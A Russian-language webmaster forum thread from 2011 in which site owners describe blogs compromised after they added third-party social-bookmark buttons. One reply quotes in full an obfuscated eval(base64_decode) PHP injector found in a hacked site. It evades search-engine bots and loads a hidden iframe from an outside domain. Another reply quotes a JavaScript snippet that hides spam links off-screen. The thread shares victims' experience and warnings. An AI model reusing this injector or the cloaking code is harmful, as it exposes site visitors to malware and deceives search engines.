WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
02 Декабрь 2016, 23:49:04 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
Re: CPA-сеть Hotpartner.biz от kuprum (CPA-сети)
Re: Нужны копирайтеры на постоянную работу! от ZAS (Ищу копирайтера, редактора, контент-менеджера)
Re: Дизайн от новичка от LanaSvetNik (Дизайн)
Re: Готовые статьи на тему "Красота и здоровье" недорого. от Oleg10 (Контент, копирайтинг, переводы)
Онлайн-консультант Jivosite со скидкой до 20% от KeyWebRu (Хостинг)
Создать тест-опрос в Гугл Документах (или ваш вариант) от Anonyff (Работа и услуги)
Re: AdBean - Бобовая тизерная сеть. Новостные и товарные тизеры. До 90% отчислений! от AdBean (Реклама и доход)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Автоматизация Яндекс Директ + возврат 8% от рекламного бюджета. от Александр_26 (Полезное)
Re: Quick Sender - Комбайн для продвижения в ВКонтакте от Dima_Myrzich (Социальные сети)
Re: Марафон Спарта от Пузата - Почему я иду от Katelite (Обучение сайтостроению, SEO и заработку)
Re: Чистенький женский СДЛ. Размещение в авто от uckpa (Платное размещение статей и ссылок)
Re: [Анонс] Программа для группировки ключевых слов KeyAssort от KeyAssort (Сервисы и SEO программы)
Re: Имеют ли вес покупные ссылки при теперешних правилах Яндекса от Lina7 (Раскрутка сайтов в поисковиках)
Re: Насколько необходим онлайн консультант на сайте? от fainna (Юзабилити)
Свежие темы
Показать ещё
  Печать  
Страниц: 1 2
Автор

Тема: Будьте осторожны с сервисами для добавления в соцзакладки  (Прочитано 3035 раз)

0 Пользователей и 1 Гость смотрят эту тему.
treya
Offline Offline

Сообщений: 436



Просмотр профиля
« : 19 Февраль 2011, 19:25:56 »

На бложик добавила сервис типа Однакнопка.ру для добавления в соцзакладки, а потом обнаружила постоянные переходы с блога на сайт секс-знакомств. Злой Долго копалась в коде и нашла в коде сервиса по соцзакладкам iframe на этот секс-сайт стеснительный. Так что проверяет и не один раз. 
Записан
craft
Offline Offline

Пол: Женский
Сообщений: 1972


Мясоооо!


Просмотр профиля WWW
« Ответ #1 : 19 Февраль 2011, 19:52:32 »

Чьим сервисом пользовались?
Записан

dileta10
Не шалю, никого не трогаю...
Offline Offline

Пол: Женский
Сообщений: 984


Я - Лена. Нужно на "Ты".


Просмотр профиля
« Ответ #2 : 19 Февраль 2011, 19:56:27 »

ну ни фига себе Злой
у Яндекса есть сервис, только там по соцсетям _http://api.yandex.ru/share/  Улыбка
Записан

AistShop
Offline Offline

Пол: Женский
Сообщений: 1244


Елена


Просмотр профиля
« Ответ #3 : 19 Февраль 2011, 22:29:58 »

А что за сервис то?
Записан

treya
Offline Offline

Сообщений: 436



Просмотр профиля
« Ответ #4 : 19 Февраль 2011, 23:18:13 »

Вот не помню, на чьем-то СЕО блоге взяла код добавления в социалки. Знаю, что дура стеснительный, нельзя брать непроверенные коды.
Записан
NovMama
Offline Offline

Пол: Женский
Сообщений: 1622



Просмотр профиля
« Ответ #5 : 20 Февраль 2011, 02:04:59 »

На бложик добавила сервис типа Однакнопка.ру для добавления в соцзакладки, а потом обнаружила постоянные переходы с блога на сайт секс-знакомств.
У меня вообще подозрения, что подобный сервис мне вирусни насажал на сайты  Злой поставила кнопки от _share42.com , но они мне не понравились, быстро снесла. Вместо них поставила кнопки от Яндекса. Но видимо, тем кнопкам хватило времени напакостить... На следующий день на моих сайтах повылезали вирусы! Уже третий день борюсь! Удаляю, вычищаю, пароли меняю а эта гадость замаскированная снова откуда-то вылезает. Похоже, придётся снести всё на фиг и установить сайты с чистого листа. Завтра этим займусь, а пока основной сайт, который меня кормит, перенесла на другой хостинг. Тоже с чистого листа его установила.
Записан
playgirl
Offline Offline

Сообщений: 5


Просмотр профиля WWW
« Ответ #6 : 20 Февраль 2011, 04:18:52 »

А у тебя случайно не DLE движок?Если да то не в закладках дело,а в дыре движка!
Записан
H2O68
Offline Offline

Пол: Женский
Сообщений: 3554



Просмотр профиля
« Ответ #7 : 20 Февраль 2011, 04:46:42 »

NovMama, а в чем эти вирусы проявляются?
Записан
NovMama
Offline Offline

Пол: Женский
Сообщений: 1622



Просмотр профиля
« Ответ #8 : 20 Февраль 2011, 17:36:51 »

А у тебя случайно не DLE движок?
Нет.


NovMama, а в чем эти вирусы проявляются?
Без понятия, в чём именно проявляются эти вирусы - у меня антивирус стоит, поэтому слава богу влияние вирусов на себе не испытываю ))) А при заходе на мои сайты мой антивирус мне сигналит об обнаружении вируса Infected.WebPage.Gen, и Яндекс пометил сайты как вредоносные, и некоторые постоянные посетители переживают и пишут мне письма, что их антивирусы не пускают их на мои сайты.

В индексных файлах сайтов появляется код в base64, вот такой:
Цитировать
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9od2dodzNoc2RoLmNvLmNjL1FRa0ZCZzBBQVEwTUJBMERFa2NKQlFZTkF3Y0NBUU1NQXc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0='));

Удаляю код - антивирус перестаёт сигнализировать об опасности. Но код вскоре появляется снова.
Я уже вычистила с сайтов несколько вредоносных исполняемых файлов, один из них вообще у меня пароли воровал, судя по коду. Не знаю, где ещё искать вредоносные файлы, но ведь откуда-то этот код появляется, значит, вредоносные файлы всё ещё есть. Хорошо замаскированы под файлы движков, видимо. Я же не в состоянии просмотреть каждый файл движка, легче всё снести.
Записан
playgirl
Offline Offline

Сообщений: 5


Просмотр профиля WWW
« Ответ #9 : 21 Февраль 2011, 15:40:28 »

Надо смотреть весь код на левые скрипты!
Записан
H2O68
Offline Offline

Пол: Женский
Сообщений: 3554



Просмотр профиля
« Ответ #10 : 21 Февраль 2011, 18:06:33 »

У меня тоже нечто похожее случилось, не знаю, это связано с _share42.com или это совпадение, но кнопки от _share42.com у меня стояли, хотя я их и поставила еще в середине января. Плюс к этому, я забыла затереть пароль доступа к ftp в ТоталКомандере.

Именно в день, когда появилась эта темка, при отчете о выполненном заказе на gogetlinks, вышло сообщение, что на моей странице 50 внешних ссылок и список этих ссылок, я как глянула на них, так и ахнула. Ссылки с анкорами на сайты для взрослых, причем некоторые из ссылок шли на мои сайты, находящиеся все на одном и том же хостинге.

Стала проверять все папки, и оказалось, что мне в папки wp-includes каждого моего сайта, находящегося на этом хостинге, засунули левый сайт, который ссылается на сайты для взрослых.
Плюс к этому был прописан скрипт с блоком ссылок  в header некоторых сайтов.

Хорошо, что заказы для gogetlinks я делаю каждый день, поэтому наличие левых ссылок было обнаружено так быстро. 17/02 утром мне их загрузили, а 19/02 я их уже обнаружила.

Все левые папки вычистила, ftp пароль поменяла (естессно, теперь его не храню в ТоталКомандере), бэкапы баз сделала. Но все равно не спокойно, может еще какие-то меры принять?
Записан
treya
Offline Offline

Сообщений: 436



Просмотр профиля
« Ответ #11 : 21 Февраль 2011, 20:47:22 »

Видимо и я тоже с этого сайта брала код, потому что та же ситуевина - часть ссылок в хедере, часть замаскирована в рубриках, датах и в ссылках на админа. 
Записан
sancey
Offline Offline

Пол: Мужской
Сообщений: 62



Просмотр профиля
« Ответ #12 : 21 Февраль 2011, 21:45:53 »

Так а что за сервис-то? Я пользуюсь share42.com - вроде только ява-скрипт, ифреймов не было.
Записан
H2O68
Offline Offline

Пол: Женский
Сообщений: 3554



Просмотр профиля
« Ответ #13 : 22 Февраль 2011, 01:20:40 »

Я не утверждаю, что это из-за них, может быть просто стечение обстоятельств, к тому же кнопки у меня стояли с середины января и все было норм. Просто эти кнопки  - это было последнее, что я добавляла в код шаблонов.

В моем случае, скорее всего просто выкрали пароль из тоталкомандера.

В ява-скриптах не разбираюсь, блок этих ссылок был обрамлен вот таким кодом, это, наверное, код, который делает ссылки невидимыми:
<script type="text/javascript">
   document.write('<' + 'di' + 'v sty' + 'le=\"position: absolute; l' + 'eft: -1976px; t' + 'op' + ': -2801px;>');
</script>
Блок ссылок
<script type="text/javascript">document.write('</d' + 'iv>');</script>

Записан
Кисточка
Offline Offline

Пол: Женский
Сообщений: 2477


Просмотр профиля
« Ответ #14 : 13 Март 2011, 23:11:38 »

у Яндекса есть сервис, только там по соцсетям _http://api.yandex.ru/share/  Улыбка
Девочки, кто ставил себе такую кнопочку, скажите пожалуйста на каком  языке она у вас?
Записан

Мой хостинг
Страниц: 1 2
  Печать  
 
Перейти в:  

| Sitemap